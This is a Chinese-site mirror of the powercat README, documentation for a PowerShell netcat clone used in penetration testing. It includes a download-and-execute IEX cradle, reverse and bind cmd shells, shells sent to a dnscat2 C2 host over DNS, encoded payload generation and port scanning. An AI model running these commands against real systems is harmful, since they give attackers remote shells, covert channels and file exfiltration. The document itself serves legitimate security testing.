powercat, 在版本 2中,netshell具有所有功能

分享于 

6分钟阅读

GitHub

  繁體 雙語
netshell features all in version 2 powershell
  • 源代码名称:powercat
  • 源代码网址:http://www.github.com/besimorhino/powercat
  • powercat源代码文档
  • powercat源代码下载
  • Git URL:
    git://www.github.com/besimorhino/powercat.git
    Git Clone代码到本地:
    git clone http://www.github.com/besimorhino/powercat
    Subversion代码到本地:
    $ svn co --depth empty http://www.github.com/besimorhino/powercat
    Checked out revision 1.
    $ cd repo
    $ svn up trunk
    
    powercat

    Netcat: Powershell版本( Powershell版本 2和更高版本支持)

    安装

    powercat是一个powershell函数。 首先你需要加载该函数,然后才能执行它。 可以将以下命令之一放入到powershell配置文件中,以便在powershell启动时自动加载 powercat。

    
    Load The Function From Downloaded. ps1 File:
    
    
    . . powercat.ps1
    
    
    Load The Function From URL:
    
    
     IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
    
    
    
    

    命令行参数:

    
    -l Listen for a connection. [Switch]
    
    
    -c Connect to a listener. [String]
    
    
    -p The port to connect to, or listen on. [String]
    
    
    -e Execute. (GAPING_SECURITY_HOLE) [String]
    
    
    -ep Execute Powershell. [Switch]
    
    
    -r Relay. Format:"-r tcp:10.1.1.1:443" [String]
    
    
    -u Transfer data over UDP. [Switch]
    
    
    -dns Transfer data over dns (dnscat2). [String]
    
    
    -dnsft DNS Failure Threshold. [int32]
    
    
    -t Timeout option. Default: 60 [int32]
    
    
    -i Input: Filepath (string), byte array, or string. [object]
    
    
    -o Console Output Type:"Host","Bytes", or"String" [String]
    
    
    -of Output File Path. [String]
    
    
    -d Disconnect after connecting. [Switch]
    
    
    -rep Repeater. Restart after disconnecting. [Switch]
    
    
    -g Generate Payload. [Switch]
    
    
    -ge Generate Encoded Payload. [Switch]
    
    
    -h Print the help message. [Switch]
    
    
    
    

    基本连接

    默认情况下,powercat从控制台读取输入,并使用写主机将输入写入控制台。 可以将输出类型更改为'字节',也可以将'字符串'更改为 -o。

    
    Basic Client:
    
    
     powercat -c 10.1.1.1 -p 443
    
    
    Basic Listener:
    
    
     powercat -l -p 8000
    
    
    Basic Client, Output as Bytes:
    
    
     powercat -c 10.1.1.1 -p 443 -o Bytes
    
    
    
    

    文件传输

    powercat可以使用 -i ( 输入) 和 -of ( 输出文件) 来来回传送文件。

    
    Send File:
    
    
     powercat -c 10.1.1.1 -p 443 -i C:inputfile
    
    
    Recieve File:
    
    
     powercat -l -p 8000 -of C:inputfile
    
    
    
    

    powercat可以用于发送和服务器外壳。 指定-e的可执行文件,或者使用-ep执行 powershell。

    
    Serve a cmd Shell:
    
    
     powercat -l -p 443 -e cmd
    
    
    Send a cmd Shell:
    
    
     powercat -c 10.1.1.1 -p 443 -e cmd
    
    
    Serve a shell which executes powershell commands:
    
    
     powercat -l -p 443 -ep
    
    
    
    

    DNS和 UDP

    powercat支持通过TCP发送数据。 指定-u以启用UDP模式。 数据也可以通过-dns发送到 dnscat2服务器确保在运行dnscat2服务器时添加"-e打开 --no-cache"。

    
    Send Data Over UDP:
    
    
     powercat -c 10.1.1.1 -p 8000 -u
    
    
     powercat -l -p 8000 -u
    
    
    Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:
    
    
     powercat -c 10.1.1.1 -p 53 -dns c2.example.com
    
    
    Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:
    
    
     powercat -dns c2.example.com -e cmd
    
    
    
    

    继电器

    在powercat中继继电器就像传统的,继电器一样,但不必创建文件或者启动第二个过程。 你还可以在不同协议的连接之间中继数据。

    
    TCP Listener to TCP Client Relay:
    
    
     powercat -l -p 8000 -r tcp:10.1.1.16:443
    
    
    TCP Listener to UDP Client Relay:
    
    
     powercat -l -p 8000 -r udp:10.1.1.16:53
    
    
    TCP Listener to DNS Client Relay
    
    
     powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
    
    
    TCP Listener to DNS Client Relay using the Windows Default DNS Server
    
    
     powercat -l -p 8000 -r dns:::c2.example.com
    
    
    TCP Client to Client Relay
    
    
     powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
    
    
    TCP Listener to Listener Relay
    
    
     powercat -l -p 8000 -r tcp:9000
    
    
    
    

    生成有效负载

    可以使用 -g ( 生成有效负载) 和 -ge ( 生成编码负载) 生成执行特定操作的有效负载。 可以通过 powershell -E执行编码有效负载。 如果你不想使用所有 powercat,你可以使用这些。

    
    Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
    
    
     powercat -c 10.1.1.15 -p 443 -e cmd -g
    
    
    Generate a bind tcp encoded command which listens on port 8000:
    
    
     powercat -l -p 8000 -e cmd -ge
    
    
    
    

    的杂项用法

    powercat还可以用于执行 portscans,并启动持久服务器。

    
    Basic TCP Port Scanner:
    
    
     (21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
    
    
    Start A Persistent Server That Serves a File:
    
    
     powercat -l -p 443 -i C:inputfile -rep
    
    
    
    

    POW  版本  feature  Powershell  Netsh  
    相关文章